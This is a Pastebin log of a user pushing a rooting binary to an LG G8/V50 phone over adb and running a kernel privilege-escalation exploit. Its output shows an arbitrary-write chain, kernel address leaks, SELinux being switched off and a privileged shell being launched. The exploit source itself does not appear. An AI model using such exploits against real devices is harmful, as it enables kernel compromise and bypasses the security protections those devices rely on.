Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] factoryversion = 'LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1'
- [+] forced use of 'LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0' target
- [+] Mapped 200000
- [+] selinux_enforcing before exploit: 1
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- [+] pipe file: 0xffffffdee35a3a00
- [*] file epitem at ffffffdeeb2bd100
- [*] Reallocating content of 'write8_inode' with controlled data..[DONE]
- [+] Overwriting 0xffffffdee35a3a20 with 0xffffffdeeb2bd150...[DONE]
- [*] Write done, should have arbitrary read now.
- [+] file operations: ffffff8c5c221050
- [+] kernel base: ffffff8c5ac7fe00
- PS C:\Users\sdk\platform-tools> adb push v50g8-root /data/local/tmp
- adb : The term 'adb' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
- spelling of the name, or if a path was included, verify that the path is correct and try again.
- At line:1 char:1
- + adb push v50g8-root /data/local/tmp
- + ~~~
- + CategoryInfo : ObjectNotFound: (adb:String) [], CommandNotFoundException
- + FullyQualifiedErrorId : CommandNotFoundException
- Suggestion [3,General]: The command adb was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type: ".\adb". See "get-help about_Command_Precedence" for more details.
- PS C:\Users\sdk\platform-tools> ./adb push v50g8-root /data/local/tmp
- v50g8-root: 1 file pushed, 0 skipped. 43.4 MB/s (42984 bytes in 0.001s)
- PS C:\Users\sdk\platform-tools> ./adb shell
- alphalm:/ $ cd /data/local/temp
- /system/bin/sh: cd: /data/local/temp: No such file or directory
- 2|alphalm:/ $ cd /data/local/tmp
- alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
- alphalm:/data/local/tmp $ ./v50g9-root -T
- /system/bin/sh: ./v50g9-root: inaccessible or not found
- 127|alphalm:/data/local/tmp $ ./v50g8-root -T
- supported targets:
- 0 : LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
- 1 : LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
- 2 : LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
- 3 : LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
- 4 : LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
- 5 : LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
- 6 : LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
- 7 : LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
- 8 : LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
- 9 : LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
- 10 : LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0
- 11 : LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0
- 12 : LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
- alphalm:/data/local/tmp $ ./v50g8-root -t 2
- [+] factoryversion = 'LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1'
- [+] forced use of 'LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9' target
- [+] Mapped 200000
- [+] selinux_enforcing before exploit: 1
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- sched_setafinnity(): Invalid argument
- [+] pipe file: 0xffffffd0a7c91c00
- [*] file epitem at ffffffd037f14e00
- [*] Reallocating content of 'write8_inode' with controlled data..[DONE]
- [+] Overwriting 0xffffffd0a7c91c20 with 0xffffffd037f14e50...[DONE]
- [*] Write done, should have arbitrary read now.
- [+] file operations: ffffff839aa21050
- [+] kernel base: ffffff8399480000
- [*] init_cred: ffffff839b82e588
- [+] memstart_addr: 0xfffffff080000000
- [+] First level entry: e8083003 -> next table at ffffffd068083000
- [+] Second level entry: e2b88003 -> next table at ffffffd062b88000
- [+] sysctl_table_root = ffffff839b85b098
- [*] Reallocating content of 'write8_sysctl' with controlled data...[DONE]
- [+] Overwriting 0xffffffd17534a868 with 0xffffffd0713b9000...[DONE]
- [+] Injected sysctl node!
- [*] Reallocating content of 'write8_selinux' with controlled data.....[DONE]
- [+] Overwriting 0xffffff839bfceffc with 0x0...[DONE]
- [*] Node write8_inode, pid 1313, kaddr ffffffd0eb722b00
- [*] Replaced sendmmsg dangling reference
- [*] Replaced sendmmsg dangling reference
- [*] Node write8_selinux, pid 1262, kaddr ffffffd15ec9c180
- [*] Replaced sendmmsg dangling reference
- [*] Replaced sendmmsg dangling reference
- [*] Node write8_sysctl, pid 1485, kaddr ffffffd12cd3d180
- [*] Replaced sendmmsg dangling reference
- [*] Replaced sendmmsg dangling reference
- [+] Cleaned up sendmsg threads
- [*] epitem.next = ffffffd0a7c91c20
- [*] epitem.prev = ffffffd0a7c91cd0
- [*] Launching privileged shell
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement